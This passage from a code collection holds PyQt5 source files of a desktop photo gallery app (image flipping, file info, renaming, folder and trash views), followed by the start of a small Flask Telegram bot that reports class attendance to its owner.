self.scene.render(painter, QRectF(image.rect()), QRectF(area))
painter.end()
# Save the new image
image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
# Hide the graphics
self.animation = Animation.fadingAnimation(Animation , self.graphics , 200)
self.animation.finished.connect(callback)
self.animation.start()
self.shortcut.setKey(QKeySequence())
def manageMenu(self):
stylesheet = """
border: 1px solid #4C566A;
padding: 10px;
padding-left: 10px;
color: white;
"""
self.menu = QSliderMenu(self.graphics)
# Show the menu
self.menu.show()
# Set alignment
self.menu.setAlignment(Qt.AlignTop | Qt.AlignRight)
for name in ["Text", "Color" , "Font Family" , "Font Size"]:
# Create a input and set size and styles accordingly
inputLabel = QLineEdit()
inputLabel.setAlignment(Qt.AlignLeft | Qt.AlignTop)
inputLabel.setPlaceholderText(name)
inputLabel.setStyleSheet(stylesheet)
inputLabel.textChanged.connect(partial(self.update, name.lower().replace(' ' , '-') , inputLabel))
self.menu.addMenu(name , inputLabel)
# Move the menu to outside of the screen
self.menu.move(QPoint(self.graphics.width() + 200, 0))
# Move it inside the screen with animation
self.animation = Animation.movingAnimation(
Animation, self.menu, QPoint(self.parent.width() - self.menu.width(), 0), 300
)
self.animation.start()
def showHelp(self):
def run_second():
self.helpLabel.show()
self.animation = Animation.fadingAnimation(Animation , self.helpLabel , 300)
self.timer = QTimer(self.parent)
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.animation.start)
self.animation.finished.connect(self.helpLabel.hide)
self.timer.start(500)
self.helpLabel = QLabel(self.graphics)
self.helpLabel.setGeometry(self.graphics.geometry())
self.helpLabel.setStyleSheet("background-color: rgba(46, 52, 64, 155); font-size: 30px")
self.helpLabel.setText("Press Ctrl+S to save and exit")
self.helpLabel.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
self.helpLabel.show()
self.animation = Animation.fadingAnimation(Animation , self.helpLabel , 300 , True)
self.animation.finished.connect(run_second)
self.animation.start()
def responser(self , event):
try:
if(self.parent.geometry() == self.original): return QGraphicsView.paintEvent(self.graphics , event)
except:
return
self.original = self.parent.geometry()
self.startAni.move(QPoint(
self.parent.width() - self.startAni.width() - 10,
10
))
self.openNewPos = QPoint(self.parent.width() - self.menu.width() , 0)
if(self.menu.pos().x() != self.graphics.width() + 200):
self.animation = Animation.movingAnimation(Animation , self.menu , self.openNewPos , 200)
self.animation.start()
return QGraphicsView.paintEvent(self.graphics , event)
class imageFlipper:
def __init__(self, renderArea, outParent) -> None:
# Make every args global
self.renderArea = renderArea
self.outParent = outParent
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.thread = QThread()
self.worker = LongProcessor()
def flipLeft(self):
# Callback
def animation_callback():
# Flip the image and set the pixmap (Updated one)
new_image = self.image.transpose(method=Image.FLIP_LEFT_RIGHT)
self.renderArea.set_pixmap(self.createPixmap(new_image))
new_image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
# Show the label after a partial hide
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, True, startValue=0.5
)
self.animation.start()
# Partial hide the label when the image is being processed
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, endValue=0.5
)
self.animation.start()
# Callback
self.animation.finished.connect(animation_callback)
def requestHandler(self , f):
pass
def flipTop(self):
# Animation callback
def animation_callback():
# Process the image
new_image = self.image.transpose(method=Image.FLIP_TOP_BOTTOM)
self.renderArea.set_pixmap(self.createPixmap(new_image))
new_image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
# Partial unhide
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, True, startValue=0.5
)
self.animation.start()
# Partial hide when the image is being processed
self.animation = Animation.fadingAnimation(
Animation, self.renderArea, 200, endValue=0.5
)
self.animation.start()
# Callback
self.animation.finished.connect(animation_callback)
def createPixmap(self, image):
if image.mode == "RGB":
r, g, b = image.split()
image = Image.merge("RGB", (b, g, r))
elif image.mode == "RGBA":
r, g, b, a = image.split()
image = Image.merge("RGBA", (b, g, r, a))
elif image.mode == "L":
image = image.convert("RGBA")
im2 = image.convert("RGBA")
data = im2.tobytes("raw", "RGBA")
qim = QImage(data, image.size[0], image.size[1], QImage.Format_ARGB32)
pixmap = QPixmap.fromImage(qim)
return pixmap
```
#### File: GalleryMan/utils/infoFinder.py
```python
from PyQt5.QtGui import QKeySequence, QPixmap
from GalleryMan.assets.QtHelpers import Animation, PopUpMessage
import os
from PIL import Image
from PyQt5.QtCore import QRect, Qt
from PyQt5.QtWidgets import QGraphicsScene, QGraphicsView, QLabel, QLineEdit, QShortcut, QVBoxLayout
class getMoreInfo:
def __init__(self , scrollArea , renderArea , directory , application) -> None:
# Make every arg global
self.renderArea = renderArea
self.scrollArea = scrollArea
self.directory = directory
self.application = application
self.message = PopUpMessage()
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
def getInfo(self):
# To prevent recreation of the parent over the widget, it would be better to hide the prent before hand
try:
self.animation = Animation.fadingAnimation(Animation , self.parent , 100)
self.animation.finished.connect(self.parent.hide)
self.animation.start()
except Exception as e:
pass
# Check if the rename option is not opened
try:
self.animation = Animation.fadingAnimation(Animation , self.renameParent , 100)
self.animation.finished.connect(self.renameParent.hide)
self.animation.start()
except:
pass
# Create a label
self.parent = QLabel(self.renderArea)
# Set a special property to prevent addition of the border on the child labels
self.parent.setProperty("class" , "need")
# Set geometry
self.parent.setGeometry(self.renderArea.geometry())
# Stylings
self.parent.setStyleSheet("""
QLabel[class="need"]{{
background-color: #2E3440;
}}
""")
# Create a layout which would hold every child labels
layout = QVBoxLayout()
# File path child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("File Path: {}".format(self.directory))
layout.addWidget(filePath)
# File name child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("File Name: {}".format(self.directory[self.directory.rindex("/") + 1:]))
layout.addWidget(filePath)
width , height = Image.open(self.directory).size
# Resolution child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("Resolution: {} x {}".format(width , height))
layout.addWidget(filePath)
bytesSize = os.path.getsize(self.directory)
# File size child
filePath = QLabel()
filePath.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
""")
filePath.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
filePath.setText("File Size: {} bytes ({} MB)".format(bytesSize , round(bytesSize / 1e+6 , 2)))
layout.addWidget(filePath)
# Set the widget
self.parent.setLayout(layout)
# Show the parent
self.parent.show()
def showInFullScreen(self):
self.graphics = QGraphicsView(self.application)
self.graphics.setGeometry(self.application.geometry())
self.graphics.setAlignment(Qt.AlignTop | Qt.AlignLeft)
self.scene = QGraphicsScene()
self.graphics.setScene(self.scene)
self.graphics.show()
self.scene.addPixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")).scaled(self.application.geometry().width() , self.application.geometry().height() , transformMode=Qt.SmoothTransformation))
self.graphics.show()
def rename(self):
try:
self.animation = Animation.fadingAnimation(Animation , self.renameParent , 100)
self.animation.finished.connect(self.renameParent.hide)
self.animation.start()
except:
pass
try:
self.animation = Animation.fadingAnimation(Animation , self.parent , 100)
self.animation.finished.connect(self.parent.hide)
self.animation.start()
except:
pass
# Create a label which will hold the text edit
self.renameParent = QLabel(self.renderArea)
self.renameParent.setProperty("class" , "need")
# New message
self.message.new_msg(self.application , "Press Enter To Rename File" , 400)
# Listen for Enter click events
key = QShortcut(QKeySequence("Return") , self.renameParent)
# Save the photo with a new filename on click
key.activated.connect(self.saveWithNew)
# Set geometry
self.renameParent.setGeometry(self.renderArea.geometry())
# Stylings
self.renameParent.setStyleSheet("""
QLabel[class="need"]{{
background-color: #2E344050;
}}
""")
# Layout which will hold text edit
layout = QVBoxLayout()
# Input box
self.inputBox = QLineEdit()
# Sized
self.inputBox.setFixedHeight(50)
self.inputBox.setFixedWidth(1000)
# Placeholder
self.inputBox.setPlaceholderText("New file name: ")
# Stylings
self.inputBox.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
font-family: Comfortaa
""")
# Alignment
self.inputBox.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
# Add to layout
layout.addWidget(self.inputBox , alignment=Qt.AlignCenter | Qt.AlignCenter)
# Set layout
self.renameParent.setLayout(layout)
# Show the label
self.renameParent.show()
def callback(self):
pass
def saveWithNew(self):
try:
self.image.save(self.inputBox.text())
self.animation = Animation.fadingAnimation(Animation , self.renameParent , 300)
self.animation.start()
except:
self.message.new_msg(self.application , "Invalid File Extension" , 400)
```
#### File: GalleryMan/utils/readers.py
```python
import os
from configparser import ConfigParser
def read_file(file_loc):
with open(file_loc) as file:
return file.read()
def change_with_config(stylesheet , config: ConfigParser = None , section: str = "folderPage"):
if(config == None):
config = ConfigParser()
config.read(os.path.join(os.path.expanduser("~") , ".config" , "galleryman", "config.ini"))
stylesheet = stylesheet.format(
backgroundColor=config.get(section , "background-color"),
lolcat=config.get(section , "headerText-color"),
headerFontFamily=config.get(section , "headerText-fontFamily"),
headerFontSize=config.get(section , "headerText-fontSize") + "px"
)
return [stylesheet , config]
```
#### File: GalleryMan/views/folderview.py
```python
from configparser import ConfigParser
import functools , json , os , pathlib
from random import randint
from PyQt5.QtCore import QObject, QParallelAnimationGroup, QPoint, QRect, QSize, QThread, QTimer, pyqtSignal, pyqtSlot
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QDialog, QHBoxLayout, QLabel, QMainWindow, QPushButton, QScrollArea, QVBoxLayout, QWidget
from PyQt5.QtGui import QCursor, QPixmap
from GalleryMan.assets.singleFolder import CustomLabel, singleFolderView
from GalleryMan.assets.QtHelpers import Animation, PopUpMessage, QCustomButton
class QDoublePushButton(QPushButton):
doubleClicked = pyqtSignal()
clicked = pyqtSignal()
def __init__(self, *args, **kwargs):
QPushButton.__init__(self, *args, **kwargs)
self.timer = QTimer()
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.clicked.emit)
super().clicked.connect(self.checkDoubleClick)
@pyqtSlot()
def checkDoubleClick(self):
if self.timer.isActive():
self.doubleClicked.emit()
self.timer.stop()
else:
self.timer.start(250)
class PixmapHeaderMaker(QObject):
finished = pyqtSignal()
def run(self , inst , parent , imageArea: QLabel , border , width , height , dir):
# Speacial treatment for liked folder
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
if(dir == LIKED_FOLDERS):
with open(dir) as f:
data = json.loads(f.read())
data = list(filter(lambda x: os.path.isfile(x) , data))
if(data == []):
parent.hide()
return
path = data[0]
else:
path = imagesFolder.get_first(dir)
if(path == None):
parent.hide()
else:
inst.no += 1
imageArea.setPixmap(
QPixmap(path).scaled(
width - (int(border) * 2),
height - 52,
transformMode=Qt.SmoothTransformation,
)
)
inst.addFolder(parent)
inst.responser(None)
self.finished.emit()
class Worker(QObject):
finished = pyqtSignal()
def run(self , inst , mode , colors , x , y , width , height , padding , includeFavs=True):
color_rest = 0
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
inst.dirs = [LIKED_FOLDERS] + inst.dirs
# Iterate through all the dirs
for i in inst.dirs:
# Create a complete path of the folder
if(i != LIKED_FOLDERS):
curr = os.path.join(os.path.expanduser("~") , i)
else:
curr = i
# Check if the path is a folder and it is not in the prevent dirs
if i == LIKED_FOLDERS or (os.path.isdir(curr) and i[0] != "." and curr not in inst.prevented_dirs):
if mode == "single":
color_rest = 0
elif mode == "random":
color_rest = randint(0, len(colors))
else:
color_rest = (color_rest + 1) % len(colors)
res = imagesFolder.update(inst , curr, x, y, False, colors[color_rest])
if res:
x += width + padding
if x > inst.window.width() - width:
x = 40
y += height + padding
self.finished.emit()
class imagesFolder:
"""Creates The UI"""
def __init__(
self,
window: QWidget,
main_window: QMainWindow,
scroll: QScrollArea,
config: ConfigParser,
topbar: QWidget,
app
) -> None:
self.app = app
self.topbar = topbar
self.main_window = main_window
self.isshown = False
self.scroll = scroll
self.scroll.horizontalScrollBar().setValue(0)
self.scroll.horizontalScrollBar().valueChanged.connect(
lambda: self.scroll.horizontalScrollBar().setValue(0)
)
self.originalPos = 0
self.currentWindow = "albums"
self.window = window
self.config = config
# Set the start value of the folders. It will keep the track of the position where the folder will be added, basically at the first of the all the folder's row
self.folderStartValue = 250
self.popup = PopUpMessage()
# A label which will contain all the folders
self.images = QLabel(self.window)
# Change the geometry
self.images.setGeometry(QRect(0, 0, 1980, 1080))
self.images.show()
self.trashFoldersLayout = None
self.allFolders = []
def start(self, label_to_change: QLabel) -> True:
"""Creates The Ui And Renders To The MainWindow passes during __init__
Args:
label_to_change (QLabel): The header text, which will be changed to the "Albums"
"""
self.scroll.verticalScrollBar().setEnabled(True)
self.scroll.verticalScrollBar().show()
# Initing all the variables that will be used
self.folders_pinned = []
self.allFolders = []
self.dirs = os.listdir(os.path.expanduser("~"))
self.label_to_change = QLabel(text="Albums", parent=self.window)
self.label_to_change.setGeometry(label_to_change.geometry())
self.label_to_change.setAlignment(label_to_change.alignment())
self.posX = self.label_to_change.y()
self.label_to_change.setStyleSheet("""
color: {};
font-family: {};
font-size: {}px;
""".format(
self.config.get("folderPage" , "headerText-color"),
self.config.get("folderPage" , "headerText-fontFamily"),
self.config.get("folderPage" , "headerText-fontSize"),
))
self.label_to_change.show()
# Change The Name Of The Window
self.window.setObjectName("PyGallery")
# Set Geometry
self.window.setGeometry(0, 0, 1900, 1000)
# Now, Folder's Header Text
self.folderHeaderText = QLabel(self.images)
# Change StyleSheet
self.folderHeaderText.setStyleSheet(
"""color: {}; font-family: {}; font-size: {}px;""".format(
self.config.get("folderPage", "folders-folderNameColor"),
self.config.get("folderPage", "folders-folderNameFontFamily"),
self.config.get("folderPage", "folders-folderNameSize"),
)
)
# Set Fixed Width And Height
self.folderHeaderText.setFixedHeight(50)
self.folderHeaderText.setFixedWidth(200)
# Move To Desired Position
self.folderHeaderText.move(QPoint(40, 170))
# Change Text
self.folderHeaderText.setText(
self.config.get("folderPage", "folders-icon")[1:-1] + "Folders"
)
# Show The Text
self.folderHeaderText.show()
# Get all the prevented directory selected during the startup
self.prevented_dirs = json.loads(
open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "scan_dirs.txt")).read()
)
# Create x and y variables which will determine the position of the folder's card
x, y = 40, self.folderStartValue
height, width = int(self.config.get("folderPage", "folders-height")), int(
self.config.get("folderPage", "folders-width")
)
height += int(self.config.get("folderPage", "folders-borderWidth"))
padding = int(self.config.get("folderPage", "folders-padding"))
mode = self.config.get("folderPage", "folders-mode")[1:-1]
colors = json.loads(self.config.get("folderPage", "folders-color"))
self.keybindings = json.loads(
self.config.get("folderPage", "folderPage-keybindings")
)
self.no = 0
self.thread = QThread(self.main_window)
self.worker = Worker()
self.worker.moveToThread(self.thread)
self.thread.started.connect(lambda : self.worker.run(self , mode , colors , x , y , width , height, padding))
self.worker.finished.connect(self.thread.quit)
self.worker.finished.connect(self.createBar)
self.thread.start()
perline = max((self.main_window.size().width() - 100) // width , 1)
self.width = (
self.label_to_change.height()
+ ((width + padding) * max(self.no , 1) // perline)
- padding
)
self.width = max(self.width, self.main_window.size().height() - 200)
self.window.setFixedHeight(self.width)
self.images.setFixedHeight(self.width)
# Display the desired message if no cards are there under the folder's header
if self.allFolders == []:
self.showMessage()
self.main_window.resizeEvent = self.responser
self.main_window.show()
# Final touches, call the responser to position the cards accurately, if it's not
self.responser(None)
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "galleryman.status") , "w") as f:
f.write("REGISTERED")
# End of the function by returning True
return True
def createBar(self):
self.panel = QLabel(self.main_window)
self.panel.setStyleSheet("background-color: {}".format(self.config.get("folderPage" , "bar-backgroundColor")))
self.layout = QHBoxLayout()
func = [self.switchToAlbums , self.moveToTrash]
i = 0
for icon , color , size , family in json.loads(self.config.get("folderPage" , "bar-icons")):
self.albums = QCustomButton(icon , None).create()
self.albums.clicked.connect(func[i])
i += 1
self.layout.addWidget(self.albums)
self.albums.setStyleSheet("color: {}; font-size: {}px; font-family: {}".format(
color , size , family
))
self.panel.setGeometry(QRect(0 , self.main_window.height() - 64 , self.main_window.width() , 64))
self.panel.show()
self.panel.setLayout(self.layout)
def update(self, dir: str, x: int, y: int, is_pinned: bool, color: str) -> bool:
"""
Creates the card of the folder
# Args:
dir (str): The path of the folder whose card needs to be created
x (int): the x position where the card will be visible
y (int): the y position where the card will be visible
is_pinned (bool): Is the folder pinned?
# Return
bool: Whether creating the folder will worth
"""
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
# Create a Button For The Card
label = QDoublePushButton("", self.images)
if dir in self.keybindings:
label.setShortcut(self.keybindings[dir])
# Set PointingHand Cursor
label.setCursor(QCursor(Qt.PointingHandCursor))
if dir in self.keybindings:
label.setShortcut(self.keybindings[dir])
# Set a special property, so as to prevent intraction of the label at the time of setting the border
label.setProperty("class", "image")
border = self.config.get("folderPage", "folders-borderWidth")
# Set the stylesheet
label.setStyleSheet(
"""
QPushButton[class="image"]{{
border: {}px solid {};
}}
""".format(
border, color
)
)
height, width = int(self.config.get("folderPage", "folders-height")), int(
self.config.get("folderPage", "folders-width")
)
# Set Fixed Width And Height
label.setFixedHeight(height + int(border))
label.setFixedWidth(width)
# Create A Label for showing the first picture
imageArea = QLabel(label)
# Set the Alignment
imageArea.setAlignment(Qt.AlignCenter)
# Set fixed width and height
imageArea.setFixedHeight(height - 52)
imageArea.setFixedWidth(width - (int(border) * 2))
# Move a little bit aside for showing the border
imageArea.move(QPoint(int(border), int(border)))
worker = PixmapHeaderMaker()
self.another = QThread(self.window)
self.another.started.connect(lambda : worker.run(self , label , imageArea , border , width , height , dir))
self.worker.finished.connect(self.another.quit)
self.worker.finished.connect(lambda : self.responser(None))
worker.moveToThread(self.another)
self.another.start()
# A Label to show the name of the directory
folderName = QLabel(label)
# Set fixed width and height
folderName.setFixedHeight(50)
folderName.setFixedWidth(width - (int(border) * 2))
folderName.move(QPoint(int(border), height - 52))
folderName.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
# Set some styles
folderName.setStyleSheet(
"color: {}; font-family: {}; font-size: {}px; padding-top: {}px".format(
self.config.get("folderPage", "folderName-color"),
self.config.get("folderPage", "folderName-fontFamily"),
self.config.get("folderPage", "folderName-fontSize"),
self.config.get("folderPage", "folderName-topPadding"),
)
)
# Set alignment
folderName.setAlignment(Qt.AlignCenter)
# Change the text of the label with the folder's name
if(dir != LIKED_FOLDERS):
folderName.setText(dir[dir.rindex("/") + 1 :])
else:
folderName.setText("Favourites")
# Move the card yo the desired postion
label.move(QPoint(x, y))
# Set a property of the card with a value as the directory, will help while pinning
label.setProperty("directory", dir)
label.show()
# Move to the next page (which shows all the available images in a folder)
label.clicked.connect(lambda: self.transfer_control(dir))
# QBalloonToopTip(self.images , self.main_window).show()
# Return True, nothing is better than that XD
return True
def addFolder(self , folder):
self.allFolders.append(folder)
def get_first(dir: str) -> str:
"""Returns the first image in the folder, or None if no image is available
Args:
dir (str): [description]
Returns:
str: [description]
"""
# Iterate through all the files and folders in the directory
for i in pathlib.Path(dir).rglob("*"):
i = str(i)
# Check if the image is a supported one
if i[-3:] in ["png", "jpeg", "jpg", "webp"] and not os.path.isdir(
"{}/{}".format(dir, i)
):
return i
return None
def responser(self, event=None):
"""Sets the geometry of the widgets according to the new width of the window
Args:
event (QEvent): Event passed during the resizing, not used
"""
# Get the necessary items from config
card_height, card_width, padding = (
int(self.config.get("folderPage", "folders-height")),
int(self.config.get("folderPage", "folders-width")),
int(self.config.get("folderPage", "folders-padding")),
)
# Hide the messages if the folders is not empty
if self.allFolders != []:
self.hide_msg()
# Check how many cards can fit in one line
self.per_line = max((self.main_window.width() - 140) // card_width, 1)
# New x and y positions
x, y = 40, 220
# Create a parallel animation group
self.an = QParallelAnimationGroup()
# Create a animation for the header if it is available
try:
self.an.addAnimation(
Animation.movingAnimation(
Animation,
self.folderHeaderText,
QPoint(40, self.folderStartValue - 80),
100,
)
)
except:
pass
self.topbar.move(QPoint(self.main_window.width() - 200 , 0))
x, y = 40, self.folderStartValue
for i in self.allFolders:
self.an.addAnimation(
Animation.movingAnimation(Animation, i, QPoint(x, y), 100)
)
# Update x and y
x += card_width + padding
if x > self.main_window.width() - 240:
x = 40
y += card_height + padding
x, y = 40, self.folderStartValue
try:
for i in self.trashItem:
self.an.addAnimation(
Animation.movingAnimation(Animation, i, QPoint(x, y), 100)
)
# Update x and y
x += card_width + padding
if x > self.main_window.width() - 240:
x = 40
y += card_height + padding
except:
pass
# Check if the msg exists
try:
self.an.addAnimation(
Animation.movingAnimation(
Animation, self.msg, QPoint(100, self.folderStartValue + 310), 100
)
)
except:
pass
self.width = (
self.label_to_change.height()
+ ((card_height + padding) * max(self.no , 1) // self.per_line)
+ self.folderHeaderText.height()
+ padding
)
self.width = max(self.width, self.main_window.size().height())
self.window.setFixedHeight(self.width)
self.images.setFixedHeight(self.width)
self.label_to_change.setFixedWidth(self.main_window.size().width())
try:
self.trashFolderHeader.setFixedWidth(self.main_window.size().width())
except:
pass
self.label_to_change.setAlignment(Qt.AlignCenter)
# Start the animation
self.an.start()
# Set the width and height of the panel
try:
self.panel.setGeometry(QRect(
0,
self.main_window.height() - 64,
self.main_window.width(),
64
))
except:
pass
def pushDown(self):
# Pushing down effect of the info
self.anim = QParallelAnimationGroup()
try:
self.anim.addAnimation(Animation.fadingAnimation(Animation, self.info, 200))
except:
pass
self.anim.addAnimation(
Animation.movingAnimation(
Animation,
self.folderHeaderText,
QPoint(40, self.folderHeaderText.pos().y() + 400),
200,
)
)
# Start the animation
self.anim.start()
# Hide the info on being animated
self.anim.finished.connect(lambda: self.info.hide())
def showMessage(self):
# Create a msg label
self.msg = QLabel(
parent=self.window,
text="Oops! Your unselected folders do no contain any image!",
)
# Set perfect geometry
self.msg.setGeometry(QRect(4000, 100, 1980, 100))
# Some styling
self.msg.setStyleSheet(
"""
QLabel{
font-size: 25px;
color: #4C566A;
}
"""
)
try:
Animation.fadingAnimation(Animation, self.msg, 400).start()
except:
pass
self.msg.show()
def hide_msg(self):
# Hides message
try:
self.ani = Animation.fadingAnimation(Animation, self.msg, 200, True)
self.ani.start()
self.ani.finished.connect(lambda: self.msg.hide())
except:
pass
def update_styling(self):
"""
Updates The Styling Of The Main Window After Adding A Property
"""
self.window.style().unpolish(self.window)
self.window.style().polish(self.window)
self.window.update()
def transfer_control(self, directory):
"""Transfers control to the singleFolderPage"""
# Parallel Animation Group
self.effects = QParallelAnimationGroup()
self.effects.addAnimation(
Animation.fadingAnimation(Animation, self.images, 400)
)
self.effects.addAnimation(
Animation.fadingAnimation(Animation, self.label_to_change, 400)
)
self.effects.addAnimation(
Animation.movingAnimation(Animation , self.panel , QPoint(0 , 1000) , 400)
)
self.effects.start()
# Run second slot of animations
self.effects.finished.connect(lambda: self.run_second(directory))
def run_second(self, dir):
self.folderHeaderText.hide()
self.args = []
try:
if not self.msg.isHidden():
self.args.append(self.msg)
self.msg.hide()
except:
pass
try:
if not self.info.isHidden():
self.args.append(self.info)
self.info.hide()
except:
pass
self.label_to_change.hide()
inst = singleFolderView()
# inst.init(self.window,
# dir,
# self.config,
# self.scroll,
# self.main_window,
# self.app,
# self.label_to_change,
# self.images,
# self.folderHeaderText,
# self.topbar,
# *self.args)
inst.init(self.window , dir , self.config , self.scroll , self.main_window , self.app , self.topbar , self.panel , self.folderHeaderText)
def createTrashLayout(self):
self.trashFoldersLayout = QLabel(self.images.parent())
self.trashFoldersLayout.setGeometry(self.images.geometry())
x , y = 40 , self.folderStartValue
mode = self.config.get("folderPage", "folders-mode")[1:-1]
colors = json.loads(self.config.get("folderPage", "folders-color"))
height, width = int(self.config.get("folderPage", "folders-height")), int(
self.config.get("folderPage", "folders-width")
)
height += int(self.config.get("folderPage", "folders-borderWidth"))
padding = int(self.config.get("folderPage", "folders-padding"))
self.trashItem = []
for file in os.listdir(os.path.join(os.path.expanduser('~') , ".galleryman" , "data" , "trashLogs.txt")):
label = CustomLabel(self.trashFoldersLayout , Qt.RightButton)
label.setGeometry(QRect(
x , y,
width , height
))
label.clicked.connect(functools.partial(self.showDeleteOptions , os.path.join(os.path.expanduser('~') , ".galleryman" , "data" , "trashFiles" , file)) , label)
label.setPixmap(QPixmap(os.path.join(os.path.expanduser('~') , ".galleryman" , "data" , "trashFiles" , file)))
label.setScaledContents(True)
label.setStyleSheet("border: 10px solid #88C0D0")
x += width + padding
if(x > self.main_window.width()):
x = 40
y += height + padding
label.show()
self.trashItem.append(label)
self.trashFoldersLayout.show()
def moveToTrash(self):
if(self.currentWindow == "trash"): return
self.currentWindow = "trash"
def run_second():
self.label_to_change.hide()
self.animation = QParallelAnimationGroup()
self.createTrashLayout()
self.trashFolderHeader = QLabel(self.trashFoldersLayout)
self.trashFolderHeader.setGeometry(self.label_to_change.geometry())
self.trashFolderHeader.setStyleSheet(self.label_to_change.styleSheet())
self.trashFolderHeader.setText("Trash")
self.trashFolderHeader.setAlignment(self.label_to_change.alignment())
self.trashFolderHeader.show()
self.animation.addAnimation(Animation.fadingAnimation(Animation, self.label_to_change , 200 , True))
self.animation.finished.connect(self.label_to_change.show)
self.animation.start()
self.animation = QParallelAnimationGroup()
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.images , 200))
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.label_to_change , 200))
self.animation.finished.connect(run_second)
self.animation.start()
def showDeleteOptions(self , directory , parent, pos):
try:
self.options.hide()
except:
pass
self.directory = directory
self.main_window.mousePressEvent = lambda pos : self.options.hide()
self.options = QLabel(parent)
self.options.setProperty("class" , "need")
self.options.setStyleSheet("""
border: 1px solid #4C566A;
""")
self.options.move(pos)
self.options.setFixedSize(QSize(200 , 100))
layout = QVBoxLayout()
for layoutOption , func in zip(["Restore" , "Delete"] , [lambda : self.restoreImage(directory , parent) , lambda : self.confirmDelete]):
label = QCustomButton(layoutOption , None).create()
label.clicked.connect(func)
label.setFixedHeight(50)
label.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
border: none
""")
layout.addWidget(label)
self.options.setLayout(layout)
self.options.show()
def restoreImage(self , directory , parent):
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashLogs.txt")) as f:
trashFiles = dict(json.loads(f.read()))
try:
dest = trashFiles.pop(directory)
except:
return
os.replace(directory , dest)
try:
self.trashItem.remove(parent)
except:
pass
self.responser()
self.popup.new_msg(self.main_window , "File restored" , 400)
def confirmDelete(self):
dialog = QDialog()
dialog.setStyleSheet('background-color: #2E3440')
layout = QVBoxLayout()
layout.setSpacing(20)
label = QLabel(text="Are you sure?")
label.setStyleSheet("color: #D8DEE9; font-size: 20px")
label.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
layout.addWidget(label)
buttons = QHBoxLayout()
button1 = QCustomButton("Yes" , None).create()
button1.clicked.connect(self.deleteForEver)
button1.setStyleSheet("color: #D8DEE9; font-size: 20px")
buttons.addWidget(button1)
button1 = QCustomButton("No" , None).create()
button1.clicked.connect(dialog.hide)
button1.setStyleSheet("color: #D8DEE9; font-size: 20px")
buttons.addWidget(button1)
layout.addLayout(buttons)
dialog.setLayout(layout)
dialog.show()
dialog.exec_()
def deleteForEver(self):
os.remove(self.directory)
self.popup.new_msg(self.main_window , "Image Deleted Successfully" , 500)
def switchToAlbums(self):
if(self.currentWindow == "albums"): return
self.currentWindow = "albums"
def run_second():
self.label_to_change.setText("Albums")
self.trashFolderHeader.hide()
self.trashFoldersLayout.hide()
self.animation = QParallelAnimationGroup()
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.images , 300 , True))
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.label_to_change , 300 , True))
self.animation.start()
self.animation.finished.connect(self.images.show)
self.animation = QParallelAnimationGroup()
try:
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.trashFolderHeader , 300))
except:
pass
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.folderHeaderText , 300))
self.animation.finished.connect(run_second)
self.animation.start()
# Complete 1000 lines!
``` |
{
"source": "0xSaurabh/monday-api",
"score": 3
} |
#### File: 0xSaurabh/monday-api/app.py
```python
from results.amizone import getAttendance, getDay, getAttendanceForDay
from flask import Flask, request, jsonify
import telegram
import datetime
import os
app = Flask(__name__)
TOKEN = os.environ.get('TOKEN')
AUTORES=os.environ.get('AUTORES')
bot = telegram.Bot(token=TOKEN)
defaultMessage = '''
Hi, I'm monday
Here are my commands:
/attendance - to list attendance of all subjects
/today - to show today's classes and their attendance
/attendanceForToday - show attendance for today's classes
'''
@app.route('/')
def default():
return 'monday api built using flask by @sksuryan'
@app.route('/{}'.format(TOKEN),methods=['post'])
def respond():
update = telegram.Update.de_json(request.get_json(),bot)
chatID = update.message.chat.id
reqdChatID = int(os.environ.get('CHATID'))
receivedMsg = update.message.text.encode('utf-8').decode()
response = ''
bot.sendChatAction(chatID, telegram.ChatAction.TYPING)
date = datetime.date.today()
if reqdChatID != chatID:
response = f'Sorry, monday is for personal use 😅'
else:
if receivedMsg == '/start':
response = defaultMessage
